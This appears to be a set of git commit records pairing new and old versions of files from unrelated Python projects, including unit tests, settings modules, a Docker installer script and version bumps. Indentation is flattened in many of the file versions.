        # With the ignore-defaults flag, keys only present in the
        # defaults chain must not be found.
        self.assertRaises(IndexError, uut.__getitem__, "great", True)
        self.assertRaises(IndexError, uut.__getitem__, " ")
if __name__ == '__main__':
unittest.main(verbosity=2)
| """
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import unittest
import sys
sys.path.insert(0, ".")
from coalib.settings.Settings import Settings, Setting
from coalib.misc.StringConstants import StringConstants
class SettingsTestCase(unittest.TestCase):
def test_construction(self):
uut = Settings(StringConstants.COMPLEX_TEST_STRING, None)
uut = Settings(StringConstants.COMPLEX_TEST_STRING, uut)
self.assertRaises(TypeError, Settings, "irrelevant", 5)
self.assertRaises(ValueError, uut.__init__, "name", uut)
def test_append(self):
uut = Settings(StringConstants.COMPLEX_TEST_STRING, None)
self.assertRaises(TypeError, uut.append, 5)
uut.append(Setting(5, 5, 5))
def test_iter(self):
defaults = Settings("default", None)
uut = Settings("name", defaults)
uut.append(Setting(5,5,5))
uut.append(Setting("TEsT",4,5))
defaults.append(Setting("tEsT", 1,3))
defaults.append(Setting(" great ", 3, 8))
defaults.append(Setting(" great ", 3, 8), custom_key="custom")
self.assertEqual(list(uut), ["5", "test", "great", "custom"])
for index in uut:
t = uut[index]
self.assertNotEqual(t, None)
self.assertEqual(True, "teST" in defaults)
self.assertEqual(True, " GREAT" in defaults)
self.assertEqual(False, " GrEAT !" in defaults)
self.assertEqual(False, "" in defaults)
self.assertEqual(int(uut["teSt "]), 4)
self.assertEqual(int(uut["GREAT "]), 3)
self.assertRaises(IndexError, uut.__getitem__, "doesnotexist")
self.assertRaises(IndexError, uut.__getitem__, " ")
if __name__ == '__main__':
unittest.main(verbosity=2)
| agpl-3.0 | Python |
00c01e9f92c0f527fa0e1ea324ee65890d1ae4a8 | comment :grin: | CloudbrainLabs/htm-challenge,lambdaloop/htm-challenge,CloudbrainLabs/htm-challenge,CloudbrainLabs/htm-challenge | brainsquared/test/test_eeg_encoder.py | brainsquared/test/test_eeg_encoder.py | import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from brainsquared.encoder.eeg_encoder import EEGEncoder
CHUNK = 128
SLIDING_WINDOW = 64
RATE = 250
MI_DATA = "data/motor_data.csv"
def visualizeSDRs(sdrs):
    """Render a list of binary SDRs as a black-and-white raster plot.

    After the 90-degree rotation each SDR becomes one column, so time
    runs along the x axis.
    """
    sdrsToVisualize = []
    for sdr in sdrs:
        # Active bits map to 255, which is black under the 'Greys' cmap.
        sdrsToVisualize.append([255 if x else 0 for x in sdr])
    imageArray = np.rot90(np.array(sdrsToVisualize))
    plt.imshow(imageArray, cmap='Greys', interpolation='nearest')
    plt.show()
def recordAndEncode(encoder):
    """Encode pre-recorded motor-imagery EEG into a list of SDRs.

    Slides a CHUNK-sized Blackman window over channel_0 of MI_DATA,
    advancing SLIDING_WINDOW samples per step, and encodes each chunk.
    """
    window = np.blackman(CHUNK)
    sdrs = []
    print "---recording---"
    d = pd.read_csv(MI_DATA)
    data = np.array(d['channel_0'])
    # Drop NaN samples before windowing.
    data = data[np.logical_not(np.isnan(data))]
    # Starts at sample 500 — presumably to skip a settling period;
    # TODO(review): confirm against the recording protocol.
    for i in xrange(500, len(data)-CHUNK, SLIDING_WINDOW):
        chunk = data[i:i+CHUNK] * window
        sdr = encoder.encode(chunk)
        sdrs.append(sdr)
    print "---done---"
    return sdrs
if __name__ == "__main__":
n = 300
w = 31
minval = 0
maxval = 0.005
# Mu wave frequency range associated with activity in the motor cortex.
# That's what we want to detect.
minFreq = 9
maxFreq = 11
soundEncoder = EEGEncoder(n, w, RATE, CHUNK, minval, maxval, minFreq, maxFreq)
sdrs = recordAndEncode(soundEncoder)
visualizeSDRs(sdrs)
| import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from brainsquared.encoder.eeg_encoder import EEGEncoder
CHUNK = 128
SLIDING_WINDOW = 64
RATE = 250
MI_DATA = "data/motor_data.csv"
def visualizeSDRs(sdrs):
sdrsToVisualize = []
for sdr in sdrs:
sdrsToVisualize.append([255 if x else 0 for x in sdr])
imageArray = np.rot90(np.array(sdrsToVisualize))
plt.imshow(imageArray, cmap='Greys', interpolation='nearest')
plt.show()
def recordAndEncode(encoder):
window = np.blackman(CHUNK)
sdrs = []
print "---recording---"
d = pd.read_csv(MI_DATA)
data = np.array(d['channel_0'])
data = data[np.logical_not(np.isnan(data))]
for i in xrange(500, len(data)-CHUNK, SLIDING_WINDOW):
chunk = data[i:i+CHUNK] * window
sdr = encoder.encode(chunk)
sdrs.append(sdr)
print "---done---"
return sdrs
if __name__ == "__main__":
n = 300
w = 31
minFreq = 9
maxFreq = 11
minval = 0
maxval = 0.005
soundEncoder = EEGEncoder(n, w, RATE, CHUNK, minval, maxval, minFreq, maxFreq)
sdrs = recordAndEncode(soundEncoder)
visualizeSDRs(sdrs)
| agpl-3.0 | Python |
1f2deb95ba543bf05dd78f1df2e9ee6d17a2c4c3 | Test profiles manager filterting method | vtemian/buffpy,bufferapp/buffer-python | buffer/tests/test_profiles_manager.py | buffer/tests/test_profiles_manager.py | import json
from nose.tools import eq_, raises
from mock import MagicMock, patch
from buffer.managers.profiles import Profiles
from buffer.models.profile import Profile, PATHS
mocked_response = {
'name': 'me',
'service': 'twiter',
'id': 1
}
def test_profiles_manager_all_method():
    '''
    Test basic profiles retrieving
    '''
    mocked_api = MagicMock()
    mocked_api.get.return_value = [{'a':'b'}]
    with patch('buffer.managers.profiles.Profile') as mocked_profile:
        mocked_profile.return_value = 1
        profiles = Profiles(api=mocked_api).all()
        # Each raw dict from the API must be wrapped in a Profile.
        eq_(profiles, [1])
        mocked_api.get.assert_called_once_with(url=PATHS['GET_PROFILES'])
        mocked_profile.assert_called_once_with(mocked_api, {'a': 'b'})
def test_profiles_manager_filter_method():
    '''
    Test basic profiles filtering based on some minimal criteria
    '''
    mocked_api = MagicMock()
    # Seed the manager directly so no API call is needed.
    profiles = Profiles(mocked_api, [{'a':'b'}, {'a': 'c'}])
    eq_(profiles.filter(a='b'), [{'a': 'b'}])
def test_profiles_manager_filter_method_empty():
    '''
    Test basic profiles filtering when the manager is empty
    '''
    mocked_api = MagicMock()
    mocked_api.get.return_value = [{'a':'b'}, {'a': 'c'}]
    # An empty manager should fall back to the API (consuming
    # get.return_value) before filtering.
    profiles = Profiles(api=mocked_api)
    eq_(profiles.filter(a='b'), [Profile(mocked_api, {'a': 'b'})])
| import json
from nose.tools import eq_, raises
from mock import MagicMock, patch
from buffer.managers.profiles import Profiles
from buffer.models.profile import PATHS
mocked_response = {
'name': 'me',
'service': 'twiter',
'id': 1
}
def test_profiles_manager_all_method():
'''
Test basic profiles retrieving
'''
mocked_api = MagicMock()
mocked_api.get.return_value = [{'a':'b'}]
with patch('buffer.managers.profiles.Profile') as mocked_profile:
mocked_profile.return_value = 1
profiles = Profiles(api=mocked_api).all()
eq_(profiles, [1])
mocked_api.get.assert_called_once_with(url=PATHS['GET_PROFILES'])
mocked_profile.assert_called_once_with(mocked_api, {'a': 'b'})
| mit | Python |
7469a750a7303b346a91376ae16dc42b69208c18 | Support for X-Ten machine IDs | SciLifeLab/TACA,SciLifeLab/TACA,kate-v-stepanova/TACA,senthil10/TACA,b97pla/TACA,guillermo-carrasco/TACA,kate-v-stepanova/TACA,SciLifeLab/TACA,senthil10/TACA,vezzi/TACA,b97pla/TACA,guillermo-carrasco/TACA,vezzi/TACA | pm/utils/filesystem.py | pm/utils/filesystem.py | """ Filesystem utilities
"""
import contextlib
import os
RUN_RE = '\d{6}_[a-zA-Z\d\-]+_\d{4}_[AB][A-Z\d]{9}'
@contextlib.contextmanager
def chdir(new_dir):
    """Context manager to temporarily change to a new directory.

    The original working directory is restored on exit, even when the
    body raises. (Note: unlike an earlier revision, new_dir is no
    longer created automatically.)
    """
    original_dir = os.getcwd()
    os.chdir(new_dir)
    try:
        yield
    finally:
        os.chdir(original_dir)
| """ Filesystem utilities
"""
import contextlib
import os
RUN_RE = '\d{6}_[a-zA-Z\d]+_\d{4}_[AB][A-Z\d]{9}'
@contextlib.contextmanager
def chdir(new_dir):
"""Context manager to temporarily change to a new directory.
"""
cur_dir = os.getcwd()
# This is weird behavior. I'm removing and and we'll see if anything breaks.
#safe_makedir(new_dir)
os.chdir(new_dir)
try:
yield
finally:
os.chdir(cur_dir)
| mit | Python |
2acaea560eaaea88a97c5b450e18ea018a3b74ad | Refactor for ease of unit testing. | geekofalltrades/quora-coding-challenges | typeahead_search/search.py | typeahead_search/search.py | import sys
from warnings import warn
class TypeAheadSearch(object):
    """Class encapsulating the action of the typeahead search.

    Reads a command count from stdin followed by that many commands,
    recording and dispatching each one.
    """
    def __init__(self):
        # Keep a record of all commands processed.
        self.commands = []

    def main(self):
        """Main search loop."""
        # Get the number of expected commands.
        self.num_commands = self.get_num_commands(
            sys.stdin.readline().strip()
        )

        # Fetch each command from the input.
        for i in range(self.num_commands):
            command = sys.stdin.readline().strip()

            # If no input is available, warn and stop: further reads
            # would only yield more empty lines, and an empty string is
            # not a parseable command.  (Fixes the "Ecountered" typo in
            # the message and the missing loop termination.)
            if not command:
                warn(
                    "Encountered unexpected EOF. (Did you provide fewer"
                    " than {} commands?)".format(self.num_commands),
                    InputWarning
                )
                break

            self.parse_command(command)

        # Check whether any input remains, and warn, if so.
        command = sys.stdin.readline().strip()
        if command:
            warn(
                "Encountered unexpected input. (Did you provide more"
                " than {} commands?) Lines from \"{}\" will not be"
                " evaluated.".format(self.num_commands, command),
                InputWarning
            )

    def get_num_commands(self, command):
        """Validate first line of input and extract expected number of
        commands.

        Raises TypeError for non-integer input and ValueError when the
        count is outside [1, 20].
        """
        try:
            num_commands = int(command)
        except ValueError:
            raise TypeError(
                "First line of input must be an integer."
            )

        if num_commands <= 0 or num_commands > 20:
            raise ValueError(
                "First line of input must be between 1 and 20, inclusive."
            )

        return num_commands

    def parse_command(self, command):
        """Read, validate, and execute a command from stdin."""
        # Store this command in the list of commands we have attempted
        # to execute.
        self.commands.append(command)

        # Begin parsing this command.
class InputWarning(UserWarning):
"""Warning raised when input is longer or shorter than expected."""
if __name__ == '__main__':
search = TypeAheadSearch()
search.main()
| import sys
from warnings import warn
class TypeAheadSearch(object):
"""Class encapsulating the action of the typeahead search."""
def __init__(self):
# Keep a record of all commands processed.
self.commands = []
def main(self):
"""Main search loop."""
# Get the number of expected commands.
self.num_commands = self.get_num_commands()
# Fetch each command from the input.
for i in range(self.num_commands):
try:
self.parse_command()
except InputWarning as e:
# warn with the InputWarning and terminate this loop.
warn(e.message, e.__class__, stacklevel=2)
break
# Check whether any input remains, and warn, if so.
command = sys.stdin.readline().strip()
if command:
warn(
"Encountered unexpected input. (Did you provide more"
" than {} commands?) Lines from \"{}\" will not be"
" evaluated.".format(self.num_commands, command),
InputWarning
)
def get_num_commands(self):
"""Read the number of expected commands from stdin."""
try:
num_commands = int(sys.stdin.readline().strip())
except ValueError:
raise TypeError(
"First line of input must be an integer."
)
if num_commands <= 0 or num_commands > 20:
raise ValueError(
"First line of input must be between 1 and 20, inclusive."
)
def parse_command(self):
"""Read, validate, and execute a command from stdin."""
command = sys.stdin.readline().strip()
# If no input is available, raise a warning.
if not command:
raise InputWarning(
"Ecountered unexpected EOF. (Did you provide fewer"
" than {} commands?)".format(self.num_commands)
)
# Otherwise, store this command in the list of commands we have
# attempted to execute.
self.commands.append(command)
# Begin parsing this command.
class InputWarning(UserWarning):
"""Warning raised when input is longer or shorter than expected."""
if __name__ == '__main__':
search = TypeAheadSearch()
search.main()
| mit | Python |
8d3931fd5effabf9c5d56cb03ae15630ae984963 | Create simple CLI for the `places` function | FlowFX/postalcodes_mexico | postalcodes_mexico/cli.py | postalcodes_mexico/cli.py | # -*- coding: utf-8 -*-
"""Console script for postalcodes_mexico."""
import sys
import click
from postalcodes_mexico import postalcodes_mexico
@click.command()
@click.argument('postalcode', type=str)
def main(postalcode):
"""Console script for postalcodes_mexico."""
places = postalcodes_mexico.places(postalcode)
click.echo(places)
return 0
if __name__ == "__main__":
sys.exit(main()) # pragma: no cover
| # -*- coding: utf-8 -*-
"""Console script for postalcodes_mexico."""
import sys
import click
@click.command()
def main(args=None):
"""Console script for postalcodes_mexico."""
click.echo("Replace this message by putting your code into "
"postalcodes_mexico.cli.main")
click.echo("See click documentation at http://click.pocoo.org/")
return 0
if __name__ == "__main__":
sys.exit(main()) # pragma: no cover
| mit | Python |
5ff8a884961555deaee314f915be9092c041bd4c | Bump version: now compatible with python 2.7 and 3 | SciLifeLab/taca-ngi-pipeline | taca_ngi_pipeline/__init__.py | taca_ngi_pipeline/__init__.py | """ Main taca_ngi_pipeline module
"""
__version__ = '0.9.0'
| """ Main taca_ngi_pipeline module
"""
__version__ = '0.8.3'
| mit | Python |
4ad2b46fc06c71fb77b751b3cec5d4ac2d915ff7 | Complete docker compose with ln | hatchery/Genepool2,hatchery/genepool | genes/docker/main.py | genes/docker/main.py | from genes.apt import commands as apt
from genes.brew import commands as brew
from genes.curl.commands import download
from genes.debian.traits import is_debian, get_codename
from genes.gnu_coreutils.commands import ln
from genes.lib.traits import if_any_funcs
from genes.linux.traits import get_distro
from genes.mac.traits import is_osx
from genes.ubuntu.traits import is_ubuntu
@if_any_funcs(is_ubuntu, is_debian)
def install_compose():
compose_version = "1.5.2"
def config_directory():
return DirectoryConfig(
path='/opt/docker-compose',
mode='755',
group='root',
user='root',
)
# FIXME: Need to find a way to handle errors here
directory.main(config_directory)
download(
"https://github.com/docker/compose/releases/download/" + compose_version + "/docker-compose-Linux-x86_64",
"/opt/docker-compose/docker-compose-" + compose_version
)
# FIXME: handle file exists
ln("-s", "/usr/local/bin/docker-compose", "/opt/docker-compose/docker-compose-" + compose_version)
@if_any_funcs(is_ubuntu, is_debian)
def install_machine():
pass
def main():
if is_debian() or is_ubuntu():
repo = get_distro().lower() + '-' + \
get_codename().lower()
apt.recv_keys('58118E89F3A912897C070ADBF76221572C52609D')
apt.add_repo('deb', 'https://apt.dockerproject.org/repo', repo, 'main')
apt.update()
apt.install('docker-engine')
install_compose()
install_machine()
elif is_osx():
brew.update()
brew.cask_install('dockertoolbox')
# elif is_alpine()
# elif is_arch()
# pacman.update()
# pacman.install('docker')
# # start docker service
# # add compose, machine
else:
# FIXME: print failure, handle osx/windows
pass
| from genes.apt import commands as apt
from genes.brew import commands as brew
from genes.curl.commands import download
from genes.debian.traits import is_debian, get_codename
from genes.lib.traits import if_any_funcs
from genes.linux.traits import get_distro
from genes.mac.traits import is_osx
from genes.ubuntu.traits import is_ubuntu
@if_any_funcs(is_ubuntu, is_debian)
def install_compose():
compose_version = "1.5.2"
def config_directory():
return DirectoryConfig(
path='/opt/docker-compose',
mode='755',
group='root',
user='root',
)
# FIXME: Need to find a way to handle errors here
directory.main(config_directory)
download(
"https://github.com/docker/compose/releases/download/" + compose_version + "/docker-compose-Linux-x86_64",
"/opt/docker-compose/docker-compose
)
@if_any_funcs(is_ubuntu, is_debian)
def install_machine():
pass
def main():
if is_debian() or is_ubuntu():
repo = get_distro().lower() + '-' + \
get_codename().lower()
apt.recv_keys('58118E89F3A912897C070ADBF76221572C52609D')
apt.add_repo('deb', 'https://apt.dockerproject.org/repo', repo, 'main')
apt.update()
apt.install('docker-engine')
install_compose()
install_machine()
elif is_osx():
brew.update()
brew.cask_install('dockertoolbox')
# elif is_alpine()
# elif is_arch()
# pacman.update()
# pacman.install('docker')
# # start docker service
# # add compose, machine
else:
# FIXME: print failure, handle osx/windows
pass
| mit | Python |
062d39cdb3922740586c2af191dc12de2e842a3c | make gradient multiplier a kwarg | kapadia/geoblend | geoblend/__init__.py | geoblend/__init__.py |
import numpy as np
from geoblend.vector import create_vector
def blend(source, reference, mask, solver, gradient_multiplier=1.0):
"""
Run a Poisson blend between two arrays.
:param source:
ndarray representing the source image
:param reference:
ndarray representing the reference image
:param mask:
ndarray representing the mask
:param solver:
A precomputed multilevel solver.
"""
indices = np.nonzero(mask)
vector = create_vector(source.astype(np.float64), reference.astype(np.float64), mask, multiplier=gradient_multiplier)
x0 = source[indices].astype('float64')
pixels = np.round(solver.solve(b=vector, x0=x0, tol=1e-03, accel='cg'))
# TODO: Add dtype min/max parameter
arr = np.zeros_like(source)
arr[indices] = np.clip(pixels, 0, 4095)
return arr |
import numpy as np
from geoblend.vector import create_vector
def blend(source, reference, mask, solver, gradient_multiplier):
"""
Run a Poisson blend between two arrays.
:param source:
ndarray representing the source image
:param reference:
ndarray representing the reference image
:param mask:
ndarray representing the mask
:param solver:
A precomputed multilevel solver.
"""
indices = np.nonzero(mask)
vector = create_vector(source.astype(np.float64), reference.astype(np.float64), mask, multiplier=gradient_multiplier)
x0 = source[indices].astype('float64')
pixels = np.round(solver.solve(b=vector, x0=x0, tol=1e-03, accel='cg'))
# TODO: Add dtype min/max parameter
arr = np.zeros_like(source)
arr[indices] = np.clip(pixels, 0, 4095)
return arr | mit | Python |
d16f2cd7cdacf5897ba21f2ea92d65724e56e377 | Add TODOs to build. | joeyespo/gitpress | gitpress/building.py | gitpress/building.py | import os
from .repository import require_repo, presentation_files
from .helpers import copy_files, remove_directory
default_out_directory = '_site'
def build(directory=None, out_directory=None):
"""Builds the site from its content and presentation repository."""
directory = directory or '.'
out_directory = os.path.abspath(out_directory or default_out_directory)
repo = require_repo(directory)
# Prevent user mistakes
if out_directory == '.':
raise ValueError('Output directory must be different than the source directory: ' + repr(out_directory))
if os.path.basename(os.path.relpath(out_directory, directory)) == '..':
raise ValueError('Output directory must not contain the source directory: ' + repr(out_directory))
# TODO: read config
# TODO: use virtualenv
# TODO: init and run plugins
# TODO: process with active theme
# Collect and copy static files
files = presentation_files(repo)
remove_directory(out_directory)
copy_files(files, out_directory, repo)
return out_directory
| import os
from .repository import require_repo, presentation_files
from .helpers import copy_files, remove_directory
default_out_directory = '_site'
def build(directory=None, out_directory=None):
"""Builds the site from its content and presentation repository."""
directory = directory or '.'
out_directory = os.path.abspath(out_directory or default_out_directory)
repo = require_repo(directory)
# Prevent user mistakes
if out_directory == '.':
raise ValueError('Output directory must be different than the source directory: ' + repr(out_directory))
if os.path.basename(os.path.relpath(out_directory, directory)) == '..':
raise ValueError('Output directory must not contain the source directory: ' + repr(out_directory))
# TODO: read config
# TODO: process themes
# Collect and copy static files
files = presentation_files(repo)
remove_directory(out_directory)
copy_files(files, out_directory, repo)
return out_directory
| mit | Python |
e51fd2045565a3cd6897cfe843ecd2746cc687dd | Fix ImportErrors on Python 3 | pettazz/pygooglevoice | googlevoice/tests.py | googlevoice/tests.py | import os
from unittest import TestCase, main
from six.moves import input
from googlevoice import Voice
from googlevoice import conf
class VoiceTest(TestCase):
voice = Voice()
voice.login()
outgoing = input('Outgoing number (blank to ignore call tests): ')
forwarding = None
if outgoing:
forwarding = input('Forwarding number [optional]: ') or None
if outgoing:
def test_1call(self):
self.voice.call(self.outgoing, self.forwarding)
def test_sms(self):
self.voice.send_sms(self.outgoing, 'i sms u')
def test_2cancel(self):
self.voice.cancel(self.outgoing, self.forwarding)
def test_special(self):
self.assert_(self.voice.special)
def test_inbox(self):
self.assert_(self.voice.inbox)
def test_balance(self):
self.assert_(self.voice.settings['credits'])
def test_search(self):
self.assert_(len(self.voice.search('joe')))
def test_disable_enable(self):
self.voice.phones[0].disable()
self.voice.phones[0].enable()
def test_download(self):
msg = list(self.voice.voicemail.messages)[0]
fn = '%s.mp3' % msg.id
if os.path.isfile(fn):
os.remove(fn)
self.voice.download(msg)
self.assert_(os.path.isfile(fn))
def test_zlogout(self):
self.voice.logout()
self.assert_(self.voice.special is None)
def test_config(self):
self.assert_(conf.config.forwardingNumber)
self.assert_(str(conf.config.phoneType) in '1237')
self.assertEqual(conf.config.get('wtf'), None)
if __name__ == '__main__':
main()
| import os
from unittest import TestCase, main
from six.moves import input
from googlevoice import Voice
class VoiceTest(TestCase):
voice = Voice()
voice.login()
outgoing = input('Outgoing number (blank to ignore call tests): ')
forwarding = None
if outgoing:
forwarding = input('Forwarding number [optional]: ') or None
if outgoing:
def test_1call(self):
self.voice.call(self.outgoing, self.forwarding)
def test_sms(self):
self.voice.send_sms(self.outgoing, 'i sms u')
def test_2cancel(self):
self.voice.cancel(self.outgoing, self.forwarding)
def test_special(self):
self.assert_(self.voice.special)
def test_inbox(self):
self.assert_(self.voice.inbox)
def test_balance(self):
self.assert_(self.voice.settings['credits'])
def test_search(self):
self.assert_(len(self.voice.search('joe')))
def test_disable_enable(self):
self.voice.phones[0].disable()
self.voice.phones[0].enable()
def test_download(self):
msg = list(self.voice.voicemail.messages)[0]
fn = '%s.mp3' % msg.id
if os.path.isfile(fn):
os.remove(fn)
self.voice.download(msg)
self.assert_(os.path.isfile(fn))
def test_zlogout(self):
self.voice.logout()
self.assert_(self.voice.special is None)
def test_config(self):
from conf import config
self.assert_(config.forwardingNumber)
self.assert_(str(config.phoneType) in '1237')
self.assertEqual(config.get('wtf'), None)
if __name__ == '__main__':
main()
| bsd-3-clause | Python |
a32cc7a92f4bb3fb6531fbd0d2afe436c8b02ee7 | Make cleaner actually run | mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge,mozilla/stoneridge | srcleaner.py | srcleaner.py | #!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import logging
import os
import shutil
import stoneridge
@stoneridge.main
def main():
"""A simple cleanup program for stone ridge that blows away the working
directory
"""
parser = stoneridge.TestRunArgumentParser()
parser.parse_args()
logging.debug('cleaner running')
workdir = stoneridge.get_config('run', 'work')
xpcoutdir = stoneridge.get_xpcshell_output_directory()
if workdir and os.path.exists(workdir):
logging.debug('removing workdir %s' % (workdir,))
shutil.rmtree(workdir)
if xpcoutdir and os.path.exists(xpcoutdir):
logging.debug('removing xpcshell output directory %s' %
(xpcoutdir,))
shutil.rmtree(xpcoutdir)
| #!/usr/bin/env python
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
import logging
import os
import shutil
import stoneridge
@stoneridge.main
def main():
"""A simple cleanup program for stone ridge that blows away the working
directory
"""
parser = stoneridge.TestRunArgumentParser()
parser.parse_args()
logging.debug('cleaner running')
parser = stoneridge.ArgumentParser()
parser.parse_args()
workdir = stoneridge.get_config('run', 'work')
xpcoutdir = stoneridge.get_xpcshell_output_directory()
if workdir and os.path.exists(workdir):
logging.debug('removing workdir %s' % (workdir,))
shutil.rmtree(workdir)
if xpcoutdir and os.path.exists(xpcoutdir):
logging.debug('removing xpcshell output directory %s' %
(xpcoutdir,))
shutil.rmtree(xpcoutdir)
| mpl-2.0 | Python |
96e7c4da370ae306e760789a874c238374b03508 | Fix styling | untitaker/vdirsyncer,untitaker/vdirsyncer,untitaker/vdirsyncer | tests/unit/cli/test_config.py | tests/unit/cli/test_config.py | import os
from vdirsyncer.cli.config import _resolve_conflict_via_command
from vdirsyncer.utils.vobject import Item
def test_conflict_resolution_command():
def check_call(command):
command, a_tmp, b_tmp = command
assert command == os.path.expanduser('~/command')
with open(a_tmp) as f:
assert f.read() == a.raw
with open(b_tmp) as f:
assert f.read() == b.raw
with open(b_tmp, 'w') as f:
f.write(a.raw)
a = Item('UID:AAAAAAA')
b = Item('UID:BBBBBBB')
assert _resolve_conflict_via_command(
a, b, ['~/command'], 'a', 'b',
_check_call=check_call
).raw == a.raw
| import os
from vdirsyncer.cli.config import _resolve_conflict_via_command
from vdirsyncer.utils.vobject import Item
def test_conflict_resolution_command():
def check_call(command):
command, a_tmp, b_tmp = command
assert command == os.path.expanduser('~/command')
with open(a_tmp) as f:
assert f.read() == a.raw
with open(b_tmp) as f:
assert f.read() == b.raw
with open(b_tmp, 'w') as f:
f.write(a.raw)
a = Item('UID:AAAAAAA')
b = Item('UID:BBBBBBB')
assert _resolve_conflict_via_command(
a, b, ['~/command'], 'a', 'b',
_check_call=check_call
).raw == a.raw
| mit | Python |
20c241a912ed37fea5bdfa89c9c2e3fb4d9112e6 | set timtec theme | mupi/timtec,virgilio/timtec,virgilio/timtec,hacklabr/timtec,virgilio/timtec,GustavoVS/timtec,AllanNozomu/tecsaladeaula,GustavoVS/timtec,hacklabr/timtec,AllanNozomu/tecsaladeaula,GustavoVS/timtec,AllanNozomu/tecsaladeaula,mupi/timtec,GustavoVS/timtec,virgilio/timtec,hacklabr/timtec,mupi/tecsaladeaula,mupi/timtec,mupi/tecsaladeaula,AllanNozomu/tecsaladeaula,mupi/tecsaladeaula,mupi/timtec,hacklabr/timtec,mupi/tecsaladeaula | timtec/settings_local_test.py | timtec/settings_local_test.py | # -*- coding: utf-8 -*-
# configurations for the test server
# https://docs.djangoproject.com/en/dev/ref/settings/
DEBUG = False
TEMPLATE_DEBUG = DEBUG
SITE_ID = 1
ALLOWED_HOSTS = [
'timtec-test.hacklab.com.br',
'.timtec.com.br',
]
TIMTEC_THEME = 'timtec'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'timtec-test',
'USER': 'timtec-test',
}
}
MEDIA_ROOT = "/home/timtec-test/webfiles/media/"
STATIC_ROOT = "/home/timtec-test/webfiles/static/"
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_SUBJECT_PREFIX = '[timtec-test]'
DEFAULT_FROM_EMAIL = 'donotreply-test@m.timtec.com.br'
CONTACT_RECIPIENT_LIST = ['timtec-dev@listas.hacklab.com.br', ]
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| # -*- coding: utf-8 -*-
# configurations for the test server
# https://docs.djangoproject.com/en/dev/ref/settings/
DEBUG = False
TEMPLATE_DEBUG = DEBUG
SITE_ID = 1
ALLOWED_HOSTS = [
'timtec-test.hacklab.com.br',
'.timtec.com.br',
]
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'timtec-test',
'USER': 'timtec-test',
}
}
MEDIA_ROOT = "/home/timtec-test/webfiles/media/"
STATIC_ROOT = "/home/timtec-test/webfiles/static/"
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_SUBJECT_PREFIX = '[timtec-test]'
DEFAULT_FROM_EMAIL = 'donotreply-test@m.timtec.com.br'
CONTACT_RECIPIENT_LIST = ['timtec-dev@listas.hacklab.com.br', ]
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| agpl-3.0 | Python |
1a5626e545b8483192d93ea57572da097a28e328 | Update version 0.7.8 -> 0.7.9 | oneklc/dimod,oneklc/dimod | dimod/package_info.py | dimod/package_info.py | # Copyright 2018 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ================================================================================================
__version__ = '0.7.9'
__author__ = 'D-Wave Systems Inc.'
__authoremail__ = 'acondello@dwavesys.com'
__description__ = 'A shared API for binary quadratic model samplers.'
| # Copyright 2018 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ================================================================================================
__version__ = '0.7.8'
__author__ = 'D-Wave Systems Inc.'
__authoremail__ = 'acondello@dwavesys.com'
__description__ = 'A shared API for binary quadratic model samplers.'
| apache-2.0 | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.